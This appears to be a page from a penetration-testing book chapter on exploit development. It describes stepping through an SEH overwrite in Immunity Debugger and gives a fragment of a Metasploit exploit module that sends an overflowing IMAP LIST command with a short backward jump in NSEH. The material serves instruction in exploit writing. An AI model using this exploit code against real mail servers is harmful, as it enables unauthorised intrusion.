background image

208

Chapter 14

The payload that we use at  , 

generic/debug_trap

, won’t actually send a 

payload. Instead, it sends multiple 

\xCC

s, or breakpoints, to debug the execu-

tion flow of the exploit. This is useful for confirming that your shellcode is 
inserted at the right places in your exploit.

After running the exploit, open the Immunity Debugger, as shown in 

Figure 14-5, and at the crash select 

View

SEH chain

. Set a breakpoint by 

pressing F2, and then press 

SHIFT

-F9 to pass the exception to the application 

and step into the 

POP-POP-RETN

 sequence of instructions.

Now, still in the debugger, press F7 to single-step through the instructions 

until you land in the 

41414141

 contained in NSEH.

Figure 14-5: Landing in the 

POP-POP-RETN

 instructions

Next, edit the exploit to include the instructions for the short jump back-

ward, as shown here:

def exploit

connected = connect_login

lead = "\x41" * 

10356

nseh = 

"\xeb\xf9\x90\x90"

evil = lead + nseh + [target.ret].pack("A3")
print_status("Sending payload")
sploit = '0002 LIST () "/' + evil + '" "PWNED"' + "\r\n"
sock.put(sploit)
handler
disconnect

end